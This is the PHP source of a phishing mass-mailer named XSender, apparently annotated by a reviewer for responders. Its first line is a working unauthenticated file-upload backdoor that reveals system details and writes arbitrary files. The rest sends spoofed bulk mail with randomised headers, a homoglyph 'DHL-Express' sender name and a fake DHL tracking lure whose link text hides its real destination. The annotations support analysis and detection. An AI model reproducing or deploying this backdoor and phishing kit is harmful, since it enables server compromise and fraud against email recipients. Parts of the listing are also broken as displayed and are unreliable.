- <?php
- // NOTE(review): file-upload backdoor, independent of the mailer below. When the request
- // carries an `x` query parameter it prints php_uname() and getcwd(), renders an upload
- // form, and copy()s the posted file to a path taken from the client-supplied file name.
- // No authentication check is visible. `up` in the comparison is an unquoted bareword, and
- // "berhasil"/"gagal" are Indonesian for "succeeded"/"failed". For responders: the presence
- // of this line means other files beside the script may have been written through it, and
- // copy() errors are hidden by '@'.
- if(isset($_GET["x"])){echo"<font color=#000000>[uname]".php_uname()."[/uname]";echo"<br><font color=#000000>[dir]".getcwd()."[/dir]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}
- // Base URL that email_format() places behind its link. This URL and the commented-out
- // one below are indicators taken from this sample only.
- $website="http://klsons.com/"; //Make this full url including folders of where login files resides
- // http://b-olam.kz/images/iv/
- // Normalises one posted form value and returns it as a string: undoes \' and \" escaping,
- // parks any remaining backslash behind a placeholder token, trims, and rewrites every
- // line-break style to "<br/>".
- // NOTE(review): the page render appears to have decoded the HTML entities this function
- // originally wrote. As shown, the "<", ">", "'" and '"' replacements map each character to
- // itself, and the final replacement string "\" is unterminated, so the listing does not
- // parse as displayed. Do not read this function as providing HTML escaping.
- function sanitizer($check){
- // "\'" in double quotes and '\"' in single quotes are both backslash + quote character.
- $check=str_replace("\'","'",$check);
- $check=str_replace('\"','"',$check);
- $check=str_replace("\\","TN9OO***:::::t&*HHHHOOOoooo0000N",$check); //just to keep track of what I will change later
- $check=trim($check);
- $check=str_replace("<","<",$check);
- $check=str_replace('>','>',$check);
- // CRLF is handled first so a Windows line break becomes one "<br/>", not two.
- $check=str_replace("\r\n","<br/>",$check);
- $check=str_replace("\n","<br/>",$check);
- $check=str_replace("\r","<br/>",$check);
- $check=str_replace("'","'",$check);
- $check=str_replace('"','"',$check);
- $check=str_replace("TN9OO***:::::t&*HHHHOOOoooo0000N","\",$check); //returning backslash in html entity
- return $check;}
- // Prepares a posted value for re-display inside a <textarea> and returns it as a string.
- // The form at the bottom of the page calls it for the 'separator' and 'mails' fields.
- // NOTE(review): as displayed, the ">", "<", "'" and '"' replacements map each character
- // to itself (entities presumably decoded by the page render), so nothing is escaped here.
- function resanitize($check){
- // Only this first replacement can match; after it no "<br/>" is left for the next two.
- $check=str_replace("<br/>","\r\n",$check);
- $check=str_replace("<br/>","\n",$check);
- $check=str_replace("<br/>","\r",$check);
- $check=str_replace(">",">",$check);
- $check=str_replace("<","<",$check);
- $check=str_replace("'","'",$check);
- $check=str_replace('"','"',$check);
- return $check;}
- // Returns true when $email matches the pattern below, false otherwise.
- // The pattern has no case-insensitive flag, so any upper-case letter fails the match,
- // and the final label must be two or three letters, so longer top-level domains fail too.
- function validate_email($email){
- $status=false;
- $regex='/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$/';
- if(preg_match($regex, $email)){$status=true;}
- return $status; }
- // Splits a "address extra..." string and returns
- // array(sender display name, $sender_email, address, first two characters of the
- // address, domain part). Nothing in the visible page calls this function.
- // NOTE(review): $sender_email is never assigned in this function, so that slot of the
- // returned array is undefined/null; $param is computed but not used.
- function subjsender($user_data){
- $user = explode(' ', $user_data);
- // explode() with a non-empty delimiter returns an array, so the first token is taken.
- $to = is_array($user) ? $user[0] : $user_data;
- $tw = substr($to, 0, 2);
- $prem = explode('@',$to);
- $prams = explode('.',$prem[1]);
- $param = strtoupper($prams[0]);
- // MIME encoded-word (UTF-8, base64). It decodes to a mixed Latin/Greek/Cyrillic
- // look-alike of "DHL-Express"; such homoglyph spellings do not match plain-ASCII
- // brand keyword filters, so compare display names after confusable normalisation.
- $sender_name = '=?UTF-8?B?RM6XTC3OldGFz4HQs8m1c3M=?=';
- return array($sender_name,$sender_email,$to,$tw,$prem[1]);
- }
- // Returns a string of $length characters (default 3) drawn from digits and ASCII letters.
- // rand() is not a cryptographic generator; in this script the result is only used to
- // vary message content (see the placeholder substitutions in sending_email()).
- function generateRandomString($length = 3) {
- $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
- $charactersLength = strlen($characters);
- $randomString = '';
- for ($i = 0; $i < $length; $i++) {
- // rand() bounds are inclusive, hence length - 1 as the upper index.
- $randomString .= $characters[rand(0, $charactersLength - 1)];
- }
- return $randomString;
- }
- // Builds one multipart/mixed message and hands it to mail() for the recipient $email.
- // Sender address, display name, subject, Reply-To and HTML body are each picked at random
- // from line-separated lists posted by the operator ($_POST), so consecutive messages
- // differ from one another. $id and $attach are accepted but never read; the attachment is
- // taken from $_FILES['attach'] instead. Nothing is returned and mail() errors are hidden
- // by '@', so the caller cannot tell whether a message was accepted.
- // Structural traits visible below that a mail filter could key on: the From display name
- // is always a UTF-8 base64 encoded-word, the Content-Type header is written as
- // "boundary = <32 hex chars>" followed by "\r\r\n\n", the HTML part declares iso-8859-1
- // with base64 transfer encoding, and each body part repeats "MIME-Version: 1.0".
- function sending_email($email,$id='1',$attach=NULL)
- {
- // $randstr and $rand are only referenced by the commented-out lines further down.
- $randstr = generateRandomString();
- $rand=rand(999,99999);
- // Operator-supplied pools. html_mess is split on "\r\n", the others on "\n", so entries
- // of the other pools may keep a trailing "\r" if the form was submitted with CRLF breaks.
- $semails = explode("\n",$_POST['semail']);
- $subjects = explode("\n",$_POST['subj']);
- $semailnames = explode("\n",$_POST['semailname']);
- $html_messs = explode("\r\n", $_POST['html_mess']);
- $reply_tos = explode("\n", $_POST['reply_to']);
- // One random pick per pool for this message.
- $semail = $semails[rand()%count($semails)];
- $subject = $subjects[rand()%count($subjects)];
- $semailname = base64_encode($semailnames[rand()%count($semailnames)]);
- // MIME boundary: md5 of a time-based unique id.
- $boundary = md5(uniqid(time()));
- $reply_to = $reply_tos[rand()%count($reply_tos)];
- //echo $semail . '<br/>' . $subject . '<br/>' . $semailname . '<br/>';
- // Per-message filler values substituted into the body placeholders below.
- $randval=rand(7,20);
- $randommix=generateRandomString($randval);
- $randomstring=generateRandomString($randval);
- $randomnumber=rand(9999,99999);
- $randommd5=md5($randomnumber);
- $totime = date("g:ia");
- $today = date("F j, Y");
- // Local part and domain of the recipient, used for [-start-] and [-end-].
- $em=explode('@',$email);
- //$semail = "no-reply-shipment".$rand."@dhlshipmentlatami-asahiclean.com";
- //$semail =str_replace("@","".generateRandomString()."@".generateRandomString().".", $semail);
- //$subject='Tracking update: Status of your parcel changed';
- // Assigned but not used anywhere in this function.
- $site_name='Account Security';
- // To send HTML mail, the Content-type header must be set
- $header = "From: =?UTF-8?B?{$semailname}?= <{$semail}>\r\n";
- $header.= "MIME-Version: 1.0\r\n";
- $header.= "Reply-To: {$reply_to}\r\n";
- $header.= "Content-Type: multipart/mixed; boundary = " . $boundary . "\r\r\n\n";
- $message = "--" . $boundary . "\r\n";
- $message .= "Content-Type: text/html; charset=iso-8859-1\r\n";
- $message .= "MIME-Version: 1.0\r\n";
- $message .= "Content-Transfer-Encoding: base64\r\n\r\n";
- // Template placeholders: recipient address and its two halves, the sending server's
- // host name and script path, random filler, and the current time and date. Because
- // [-host-] and [-self-] expand to $_SERVER values, a body that uses them names the
- // server this script runs on.
- $html_mess = $html_messs[rand()%count($html_messs)];
- $html_mess = str_replace('[-email-]', $email, $html_mess);
- $html_mess = str_replace('[-start-]', $em[0], $html_mess);
- $html_mess = str_replace('[-end-]', $em[1], $html_mess);
- $html_mess = str_replace('[-host-]', $_SERVER['HTTP_HOST'], $html_mess);
- $html_mess = str_replace('[-self-]', $_SERVER['PHP_SELF'], $html_mess);
- $html_mess = str_replace('[-randomstring-]', $randommix, $html_mess);
- $html_mess = str_replace('[-randommd5-]', $randommd5, $html_mess);
- $html_mess = str_replace('[-randomletters-]', $randomstring, $html_mess);
- $html_mess = str_replace('[-randomnumber-]', $randomnumber, $html_mess);
- $html_mess = str_replace('[-time-]', $totime, $html_mess);
- $html_mess = str_replace('[-date-]', $today, $html_mess);
- $message .= base64_encode($html_mess) . "\r\n";
- // Optional attachment part. Type and file name are copied from the upload metadata as
- // sent by the client. chunk_split() runs on the raw bytes before base64_encode(), so the
- // encoded part is emitted as one unbroken base64 line; the fopen() handle is not closed.
- if ($_FILES['attach']['size'] > 0)
- {
- $message .= "--" . $boundary . "\r\n"
- . "Content-Type:" . $_FILES['attach']['type'] . "; name=\"" . $_FILES['attach']['name'] . "\"\r\n"
- . "MIME-Version: 1.0\r\n"
- . "Content-Disposition: attachment; filename=\"" . $_FILES['attach']['name'] . "\"\r\n"
- . "Content-Transfer-Encoding: base64\r\n"
- . "X-Attachment-Id: " . rand(1000,99999) . "\r\n\r\n"
- . base64_encode(chunk_split(fread(fopen($_FILES['attach']['tmp_name'], "r"),$_FILES['attach']['size']))) . "\r\n"
- . "--" . $boundary . "--\r\n";
- }
- else
- {
- // No attachment: close the multipart body right after the HTML part.
- $message .= "--" . $boundary . "--\r\n";
- }
- @mail($email,$subject, $message, $header);
- }
- // Returns a hard-coded HTML lure as a string. The visible link text is a dhl.com
- // tracking URL while the href is $website."/?email=".$email, so the text shown and the
- // real destination differ and the recipient address is passed to the landing page in
- // the query string. $id, $em, $tw and $prem are set but never used, and nothing in the
- // visible page calls this function (the form handler sends the posted html_mess).
- // NOTE(review): the markup is unbalanced as shown (text and a stray </p> follow
- // </style>, and <head>/<html> are never closed) — possibly lost in the paste.
- function email_format($email,$id='1'){
- global $website;
- $url=$website."/?email=".$email;
- $em=explode('@',$email);
- $tw = substr($email, 0, 2);
- $prem = explode('@',$email);
- $message="
- <!doctype html>
- <html>
- <head>
- <style>
- body {
- background-color:#FFFFFF;
- font-size:16px;
- font-family:monospace;
- margin:0;
- padding:0;
- -ms-text-size-adjust: 100%;
- -webkit-text-size-adjust: 100%;
- }
- ul.a {
- list-style-type: circle;
- }
- ul.b {
- list-style-type: square;
- }
- table {
- border: none;
- border-collapse: separate;
- width: 100%; }
- table td {
- font-family: monospace;
- font-size: 14px;
- vertical-align: top; }
- /* -------------------------------------
- RESPONSIVE AND MOBILE FRIENDLY STYLES
- ------------------------------------- */
- @media only screen and (max-width: 620px) {
- table[class=body] h1 {
- font-size: 28px !important;
- margin-bottom: 10px !important; }
- table[class=body] p,
- table[class=body] ul,
- table[class=body] ol,
- table[class=body] td,
- table[class=body] span,
- table[class=body] a {
- font-size: 16px !important; }
- table[class=body] .wrapper,
- table[class=body] .article {
- padding: 10px !important; }
- table[class=body] .content {
- padding: 0 !important; }
- table[class=body] .container {
- padding: 0 !important;
- width: 100% !important; }
- table[class=body] .main {
- border-left-width: 0 !important;
- border-radius: 0 !important;
- border-right-width: 0 !important; }
- table[class=body] .btn table {
- width: 100% !important; }
- table[class=body] .btn a {
- width: 100% !important; }
- table[class=body] .img-responsive {
- height: auto !important;
- max-width: 100% !important;
- width: auto !important; }}
- </style>Status of your parcel has changed.<br><br>Track your parcel here: <a href='".$url."'> https://dhl.com/tracking_shipment/jsu3hty3hy4gey3yerh</a></p>
- <p>We hope to receive your correct delivery details to enable us schedule a new delivery</p>
- <br><br>
- <p>Best Regards</p>
- <p>DHL International ©</p>
- ";
- return $message; }
- ?><html>
- <head>
- <title>Xsender</title>
- </head>
- <body style='width:100%;color:#000;background:#E0E6F8;font-family:calibri;'>
- <div style='width:100%;max-width:600px;margin:0px auto 0px auto;padding:10px;border:#999 1px solid;box-shadow:10px 10px #666;min-height:500px;'>
- <h1 style='color:#666;text-align:center;text-shadow:#000 1px 1px;'>XSender</h1>
- <?php
- // Form handler: runs when the 'go' submit button was posted. It splits the posted
- // address list, checks each entry with validate_email(), calls sending_email() for the
- // ones that pass, and prints a per-address line plus a final count.
- // NOTE(review): no login or token check is visible before mail is sent, so anyone who
- // can reach this URL can use the host's mail() to send. $_SESSION is written and read
- // although no session_start() appears in the visible page. Posted values are printed
- // back into the page; as displayed, sanitizer() does not escape them.
- if(isset($_POST['go']) ){
- //sanitize the data
- // Seeds rand() from the current time.
- srand(time(NULL));
- $_SESSION['xsenderid']=sanitizer($_POST['id']);
- $separator=sanitizer($_POST['separator']);
- $mails=sanitizer($_POST['mails']);
- $id=$_SESSION['xsenderid'];
- // sanitizer() has already turned line breaks into "<br/>", so that is the default
- // separator for a newline-separated list.
- if($separator==''){$separator='<br/>';}
- if($mails!=''){
- $mails=explode($separator,$mails);
- $total=count($mails);
- $valid=0;
- for($i=0;$i<$total;$i++){
- $email=$mails[$i];
- if(validate_email($email)){
- $valid=$valid+1;
- print "<div style='color:green;'>".$email." valid and queued</div>";
- //Send here
- // Sent inline, one mail() call per address; $valid counts addresses that passed
- // validation, not confirmed deliveries (sending_email() returns nothing).
- sending_email($email,$id);
- //send here
- } else {print "<div style='color:gray;'>".$email." not valid</div>"; }
- }
- print "<h1 style='color:green;'>Bravo! ".$valid."/".$total." Sent! <a href='' style='color:green'>Continue</a></h1>";
- } else {print "<h1 style='color:red'>Mails or Details empty</h1>"; }
- }
- ?>
- <form method='POST' action='#' enctype="multipart/form-data">
- <div>
- <div>Select Your ID</div>
- <select name='id' style='width:100%;'>
- <?php
- // Re-offers the previously submitted id as the first <option>. The stored value is
- // written into the attribute and the label exactly as held in the session.
- // NOTE(review): it originates from $_POST['id'] in the form handler — confirm how it is
- // escaped, since sanitizer() as displayed leaves markup characters unchanged.
- if(isset($_SESSION['xsenderid']))
- {print "<option value='".$_SESSION['xsenderid']."'>".$_SESSION['xsenderid']."</option>";}
- ?>
- <option value='1'>1</option>
- <option value='2'>2</option>
- <option value='3'>3</option>
- <option value='4'>4</option>
- </select>
- </div>
- <p> </p>
- <div>
- <div>Email Separator (Leave Empty if new line)</div>
- <textarea name='separator' style='width:100%;height:20px;'><?php if(isset($_POST['separator'])){print resanitize($_POST['separator']);} ?></textarea>
- </div>
- <p> </p>
- <div>
- <div>Paste Emails separated by separator</div>
- <textarea name='mails' style='width:100%;height:200px;'><?php if(isset($_POST['mails'])){print resanitize($_POST['mails']);} ?></textarea>
- </div>
- <p> </p>
- <div>
- <div>Email display name</div>
- <input type="text" name='semailname' />
- </div>
- <p> </p>
- <div>
- <div>Email to send from</div>
- <input type="text" name='semail' />
- </div>
- <p> </p>
- <div>
- <div>Reply-To email:</div>
- <input type="text" name='reply_to' />
- </div>
- <p> </p>
- <div>
- <div>Subject</div>
- <input type="text" name='subj' />
- </div>
- <p> </p>
- <div>Email Message (paste HTML code) or text</div>
- <textarea name='html_mess' style='width:100%;height:300px;'></textarea>
- <p> </p>
- <div>
- <input type="file" name="attach" /> <label for="attach">Attachment</label>
- </div>
- <p> </p>
- </div>
- <div style='text-align:center;'>
- <input type='submit' value='Go Xsender' name='go' style='color:#FFF;background:#333;'/>
- </div>
- <p> </p>
- </form>
- </div>
- </body>
- </html>